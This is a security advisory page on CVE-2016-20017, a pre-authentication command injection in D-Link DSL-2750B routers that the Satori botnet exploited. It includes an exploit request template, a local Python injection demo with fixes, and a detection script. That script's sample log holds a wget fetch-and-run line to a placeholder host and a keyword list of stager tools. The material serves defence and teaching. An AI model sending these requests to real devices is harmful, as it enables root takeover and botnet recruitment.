CVE-2016-20017 — D-Link DSL-2750B Devices Command Injection Vulnerability


D-Link DSL-2750B — Unauthenticated Command Injection via login.cgi cli Parameter Enables Root RCE; Exploited by Botnets Including Satori; No Patch for EOL Devices

The D-Link DSL-2750B is a DSL modem/router combo device deployed in home and small business environments, providing DSL broadband connectivity with integrated Wi-Fi and wired LAN switching. It was widely deployed by internet service providers (ISPs) as customer premises equipment (CPE) in multiple regions including South America, Asia, and the Middle East — making it a mass-deployment device with millions of units in the field. The DSL-2750B's web management interface is often accessible from the internet (WAN side) as part of its remote management functionality, exposing it directly to internet-based attackers.

CPE devices provided by ISPs are particularly challenging to secure: users rarely interact with or update them, firmware update mechanisms may be under ISP control rather than the end user's, and the devices are internet-facing by design. A vulnerability in mass-deployed ISP CPE represents a massive exploitable surface.

Overview

Actively Exploited. This vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on January 8, 2024. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2016-20017 is an unauthenticated command injection vulnerability in the D-Link DSL-2750B router's login.cgi web interface. The cli parameter passed to login.cgi is processed without sanitization and injected directly into an OS command execution context, allowing a remote unauthenticated attacker to execute arbitrary commands with root privileges simply by sending a crafted HTTP request to the device's web management interface. The Satori botnet (a Mirai variant) weaponized this vulnerability in November 2017 for mass recruitment of DSL-2750B devices. CVE-2016-20017 was formally published by NVD in 2022 despite active exploitation beginning years earlier. CISA added it to the KEV catalog in January 2024.

Affected Versions

Product / Firmware                                   Status
DSL-2750B firmware prior to the patched version      Vulnerable
DSL-2750B variants at end-of-support (no patch)      Permanently vulnerable

Check D-Link's security advisory SAP10088 for patch availability for your specific hardware/firmware version. Some DSL-2750B variants may not have received security patches.

Technical Details

Root Cause: login.cgi cli Parameter Command Injection

CVE-2016-20017 is a command injection vulnerability (CWE-77) in the D-Link DSL-2750B's embedded HTTP server. The login.cgi script, which serves the router's login page, accepts a cli parameter intended to carry a command-line argument for internal processing. The value is concatenated into a shell command and executed without neutralizing shell metacharacters (newline, ;, |, &&, $(), and so on), so attacker-controlled text becomes part of the command line.

Exploitation example:

GET /login.cgi?cli=aa%0a<malicious-command> HTTP/1.1
Host: 192.168.1.1

A URL-encoded newline (%0a), or any other shell command separator, in the cli parameter terminates the intended command and causes the embedded shell to execute whatever follows it; the injected command is simply URL-encoded as part of the query string (spaces as %20, for example). The HTTP server runs as root on the embedded Linux system, so the injected command runs as root.
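The mechanism above, as an added example that is not D-Link firmware code: a stand-in for a login.cgi handler that splices the decoded cli value into a shell string, next to the argv-only fix and the allowlist fix. `echo` plays the role of the device's internal CLI binary (an assumption made for this demo), and the request lines are constructed.

```python
# Added example, not D-Link firmware code: a stand-in for a login.cgi handler that
# splices the cli parameter into a shell command, next to the argv-based and
# allowlist-based fixes. `echo` plays the role of the device's internal CLI
# binary (an assumption made for this demo); the request lines are constructed.
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Assumed shape of a legitimate cli value: a short token, nothing else.
CLI_TOKEN = re.compile(r"[A-Za-z0-9_-]{1,32}")


def cli_from_request_line(request_line: str) -> str:
    """Pull the URL-decoded cli value out of "GET /login.cgi?cli=... HTTP/1.1"."""
    target = request_line.split(" ")[1]
    query = urlsplit(target).query
    # parse_qs percent-decodes, so %0a arrives here as a real newline.
    return parse_qs(query, keep_blank_values=True).get("cli", [""])[0]


def vulnerable_login(request_line: str) -> str:
    """Mirrors the bug: the decoded value is interpolated into a shell string."""
    cli = cli_from_request_line(request_line)
    # /bin/sh treats the embedded newline as a command separator, so
    # "aa\necho INJECTED" runs `echo aa` and then `echo INJECTED`.
    result = subprocess.run(f"echo {cli}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def argv_only_login(request_line: str) -> str:
    """First fix: no shell. The whole value is one argv element, so the
    metacharacters are inert, although the junk still reaches the program."""
    cli = cli_from_request_line(request_line)
    result = subprocess.run(["echo", cli], capture_output=True, text=True)
    return result.stdout


def hardened_login(request_line: str) -> str:
    """Second fix on top: reject anything outside the allowlist before use."""
    cli = cli_from_request_line(request_line)
    if not CLI_TOKEN.fullmatch(cli):
        return "ERROR: invalid cli value\n"
    result = subprocess.run(["echo", cli], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    probe = "GET /login.cgi?cli=aa%0aecho%20INJECTED HTTP/1.1"
    print(repr(vulnerable_login(probe)))   # 'aa\nINJECTED\n': the second command ran
    print(repr(argv_only_login(probe)))    # 'aa\necho INJECTED\n': echoed, not run
    print(repr(hardened_login(probe)))     # 'ERROR: invalid cli value\n'
```

The argv form alone already removes the shell from the path, which is why the injected text comes back as literal output; the allowlist is what stops hostile input from reaching the CLI binary at all, which matters when that binary has its own parsing bugs.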

Satori botnet payload (2017): The Satori botnet (tracked as a Mirai variant by Check Point and other researchers) exploited CVE-2016-20017 with a payload that:

  1. Sent the login.cgi exploit request to DSL-2750B management ports (80, 8080)
  2. Used the command injection to download and execute Satori malware from attacker-controlled servers
  3. Enrolled the compromised device in the Satori botnet for DDoS and scanning operations

No authentication required: Unlike the related D-Link DCS-930L command injection (CVE-2016-11021), which is rated PR:H, CVE-2016-20017 requires no credentials: the injection sits in login.cgi, the page served before authentication. Any attacker who can reach port 80 or 8080 on the DSL-2750B can exploit it.

Internet-Accessible Attack Surface

The DSL-2750B is a DSL CPE device — its WAN interface faces the internet directly. The web management interface, if accessible from the WAN side (common in ISP deployments for remote management), exposes CVE-2016-20017 to any internet attacker:

  • No LAN access required — the exploit works over the internet
  • No credentials required — pre-authentication injection
  • Massively scalable — automated scanners locate exposed DSL-2750B devices by HTTP banner or port fingerprint and fire the single request at each one

Attack Characteristics

Attribute         Detail
Attack Vector     Network: crafted HTTP GET request to login.cgi
Authentication    None required
Parameter         cli in login.cgi
Injection Point   Newline / shell metacharacter injection
Impact            Root command execution on embedded Linux
Botnet            Satori (Mirai variant, November 2017)

Discovery

The vulnerability in D-Link DSL-2750B's login.cgi was exploited by the Satori botnet in November 2017, which brought it to widespread security community attention. D-Link published security advisory SAP10088 acknowledging the issue. CVE assignment and NVD publication were delayed until 2022 — a notable gap reflecting the slow CVE tracking process for older IoT vulnerabilities.

Exploitation Context

  • Satori botnet mass exploitation (2017): Satori, a Mirai variant written by a threat actor later identified and prosecuted, used CVE-2016-20017 as one of its propagation exploits in November–December 2017; Satori spread rapidly to hundreds of thousands of DSL-2750B devices within days, demonstrating the scale achievable with an unauthenticated pre-auth exploit against ISP-deployed CPE
  • ISP CPE mass deployment vulnerability: The DSL-2750B's widespread ISP deployment in specific regions (particularly South America, Asia, and Middle East) created a geographically concentrated vulnerable population; region-specific attacks targeting ISP customers could exploit millions of devices via a single vulnerability
  • No credential barrier: The pre-authentication injection (PR:N, UI:N) means CVE-2016-20017 is exploitable by fully automated scanners without any brute-force credential step; this reduces time-to-compromise to seconds per target
  • Long unpatched exploitation window: CVE-2016-20017 was actively exploited by botnets for at least 5 years before formal CVE assignment in 2022 and CISA KEV addition in 2024; ISP CPE devices with long deployment lifetimes and slow firmware update cycles create multi-year exploitation windows
  • CISA KEV (2024): Added January 8, 2024, reflecting continued active exploitation of DSL-2750B devices in botnet campaigns and other attacks

Remediation

CISA BOD 22-01 Deadline: January 29, 2024. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
  1. Apply D-Link firmware update — check D-Link's security advisory SAP10088 and the D-Link support portal for a patched firmware version for your DSL-2750B model and region variant. Apply the update if available.

  2. Disable WAN-side web management access — if the DSL-2750B management interface (HTTP, HTTPS) is accessible from the internet (WAN side), disable WAN-side remote management in the router settings. This is the single most impactful mitigation for internet-based exploitation.

  3. Contact your ISP — if the DSL-2750B is ISP-provided CPE, contact your ISP to request a firmware update or device replacement; ISPs may have the ability to remotely push firmware updates to CPE devices via TR-069 management protocols.

  4. Replace end-of-support devices — if no firmware patch is available for your DSL-2750B variant, replace the device with a current, actively supported modem/router. Priority replacement is warranted given the CRITICAL severity and confirmed active exploitation.

  5. Check for signs of compromise — if the device has been internet-accessible with this vulnerability, assume it may be compromised; check for unexpected outbound traffic (scanning of telnet and HTTP ports, flood traffic), unfamiliar devices on the LAN, and changed DNS server settings. Mirai-family implants such as Satori run from memory and do not survive a reboot, so power-cycle and factory-reset the device before patching or replacing it, and keep its management interface off the internet until then, since an exposed device is quickly re-infected.

  6. Change management credentials — even after patching the pre-auth injection, set a strong admin password to prevent authenticated attacks and unauthorized configuration changes.
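For step 5, and for the Satori download-and-execute chain described under Technical Details, the following is an added example (not part of the advisory) of detection logic: it flags login.cgi requests whose cli parameter carries shell metacharacters after URL-decoding, and marks those that also contain stager tooling. The access log lines are constructed for the demo; a DSL-2750B itself may keep no HTTP log, so in practice this runs against a proxy, IDS or ISP-side capture of requests to the device.

```python
# Added example, not part of the advisory: flag login.cgi requests whose cli
# parameter carries shell metacharacters after URL-decoding, the shape of both
# the original exploit and the Satori download-and-execute stage. The access
# log lines are constructed for this demo.
import re
from urllib.parse import unquote

# Combined-log-format line (assumption about the log layout).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Anything that lets the value escape the intended argument.
SHELL_META = re.compile(r"[\r\n;|&`$(){}<>]")
# Stager tooling typical of Mirai-family payloads (wget/tftp fetch, chmod, run).
STAGER = re.compile(r"\b(wget|curl|tftp|busybox|chmod|sh)\b")

# Constructed sample: one fetch-and-run attempt, one benign login, one probe,
# one unrelated request. Addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.9 - - [27/Nov/2017:03:14:07 +0000] "GET /login.cgi?cli=aa%0awget%20http://198.51.100.5/s.sh HTTP/1.1" 200 512
192.168.1.20 - - [27/Nov/2017:03:15:00 +0000] "GET /login.cgi?cli=aa HTTP/1.1" 200 4098
203.0.113.9 - - [27/Nov/2017:03:16:42 +0000] "GET /login.cgi?cli=aa%3Bid HTTP/1.1" 200 512
192.168.1.21 - - [27/Nov/2017:03:17:10 +0000] "GET /index.html HTTP/1.1" 200 2300
"""


def cli_param(target: str):
    """Return the decoded cli value from a request target, or None.
    Parsed by hand so a raw ';' in the query is kept as data rather than
    treated as a parameter separator (older urllib versions split on it)."""
    path, _, query = target.partition("?")
    if not path.endswith("/login.cgi"):
        return None
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) == "cli":
            return unquote(value)
    return None


def classify(line: str):
    """One hit dict per suspicious request, None for anything benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    value = cli_param(m["target"])
    if value is None or not SHELL_META.search(value):
        return None
    return {
        "src": m["src"],
        "ts": m["ts"],
        "cli": value,
        "stager": bool(STAGER.search(value)),  # fetch-and-run, not just a probe
    }


def scan(log_text: str) -> list:
    """Run classify over every line and keep the hits, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Decoding before matching is the point: a signature written against the raw request line sees `%0a` and `%3B`, not the newline and semicolon the device's shell will see, and misses trivially re-encoded variants.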

Key Details

Property              Value
CVE ID                CVE-2016-20017
Vendor / Product      D-Link — DSL-2750B Devices
NVD Published         2022-10-19
NVD Last Modified     2025-11-05
CVSS 3.1 Score        9.8
CVSS 3.1 Vector       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity              CRITICAL
CWE                   CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection')
CISA KEV Added        2024-01-08
CISA KEV Deadline     2024-01-29
Known Ransomware Use  No

CVSS 3.1 Breakdown

Attack Vector         Network
Attack Complexity     Low
Privileges Required   None
User Interaction      None
Scope                 Unchanged
Confidentiality       High
Integrity             High
Availability          High

Required Action

CISA BOD 22-01 Deadline: 2024-01-29. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date         Event
2016-01-01   Command injection vulnerability present in D-Link DSL-2750B firmware (approximate date)
2017-11-27   Satori botnet (Mirai variant) actively exploits DSL-2750B command injection for mass recruitment
2022-10-19   CVE-2016-20017 formally published by NVD (years after active exploitation began)
2024-01-08   Added to CISA Known Exploited Vulnerabilities catalog
2024-01-29   CISA BOD 22-01 remediation deadline